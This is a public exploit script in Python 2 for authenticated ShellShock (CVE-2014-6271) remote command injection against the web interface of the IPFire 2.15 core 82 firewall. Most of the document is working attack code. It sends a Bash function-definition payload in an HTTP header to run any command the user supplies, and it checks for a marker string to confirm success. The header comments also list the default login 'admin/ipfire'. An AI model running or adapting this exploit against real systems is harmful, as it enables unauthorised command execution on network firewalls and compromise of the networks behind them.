IPFire 2.15 Bash Command Injection

`#!/usr/bin/env python  
#  
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)  
#  
# Exploit Author : Claudio Viviani  
#  
# Vendor Homepage : http://www.ipfire.org  
#  
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso  
#  
# Date : 2014-09-29  
#  
# Fixed version: IPFire 2.15 core 83 (2014-09-28)  
#  
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.  
# It can be maintained via a web interface.  
# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.  
# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.  
#  
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection  
# (CVE-2014-6271)  
#  
# Suggestion:  
#  
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)  
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)  
#  
#  
# http connection  
import urllib2  
# Basic Auth management Base64  
import base64  
# Args management  
import optparse  
# Error management  
import sys  
  
banner = """  
___ _______ _______ __ _______ __  
| | _ | _ |__.----.-----. | _ .-----|__|  
|. |. 1 |. 1___| | _| -__| |. 1___| _ | |  
|. |. ____|. __) |__|__| |_____| |. |___|___ |__|  
|: |: | |: | |: 1 |_____|  
|::.|::.| |::.| |::.. . |  
`---`---' `---' `-------'  
_______ __ __ __ _______ __ __  
| _ | |--.-----| | | _ | |--.-----.----| |--.  
| 1___| | -__| | | 1___| | _ | __| <  
|____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|  
|: 1 | |: 1 |  
|::.. . | |::.. . |  
`-------' `-------'  
  
IPFire <= 2.15 c0re 82 Authenticated  
Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n  
  
Written by:  
  
Claudio Viviani  
  
http://www.homelab.it  
  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww  
"""  
  
# Check url  
def checkurl(url):  
if url[:8] != "https://" and url[:7] != "http://":  
print('[X] You must insert http:// or https:// procotol')  
sys.exit(1)  
else:  
return url  
  
def connectionScan(url,user,pwd,cmd):  
print '[+] Connection in progress...'  
try:  
response = urllib2.Request(url)  
content = urllib2.urlopen(response)  
print '[X] IPFire Basic Authentication not found'  
except urllib2.HTTPError, e:  
if e.code == 404:  
print '[X] Page not found'  
elif e.code == 401:  
try:  
print '[+] Authentication in progress...'  
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')  
headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }  
response = urllib2.Request(url, None, headers)  
response.add_header("Authorization", "Basic %s" % base64string)  
content = urllib2.urlopen(response).read()  
if "ipfire" in content:  
print '[+] Username & Password: OK'  
print '[+] Checking for vulnerability...'  
if 'H0m3l4b1t' in content:  
print '[!] Command "'+cmd+'": INJECTED!'  
else:  
print '[X] Not Vulnerable :('  
else:  
print '[X] No IPFire page found'  
except urllib2.HTTPError, e:  
if e.code == 401:  
print '[X] Wrong username or password'  
else:  
print '[X] HTTP Error: '+str(e.code)  
except urllib2.URLError:  
print '[X] Connection Error'  
else:  
print '[X] HTTP Error: '+str(e.code)  
except urllib2.URLError:  
print '[X] Connection Error'  
  
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')  
commandList.add_option('-t', '--target', action="store",  
help="Insert TARGET URL",  
)  
commandList.add_option('-c', '--cmd', action="store",  
help="Insert command name",  
)  
commandList.add_option('-u', '--user', action="store",  
help="Insert username",  
)  
commandList.add_option('-p', '--pwd', action="store",  
help="Insert password",  
)  
options, remainder = commandList.parse_args()  
  
# Check args  
if not options.target or not options.cmd or not options.user or not options.pwd:  
print(banner)  
commandList.print_help()  
sys.exit(1)  
  
print(banner)  
  
url = checkurl(options.target)  
cmd = options.cmd  
user = options.user  
pwd = options.pwd  
  
connectionScan(url,user,pwd,cmd)  
`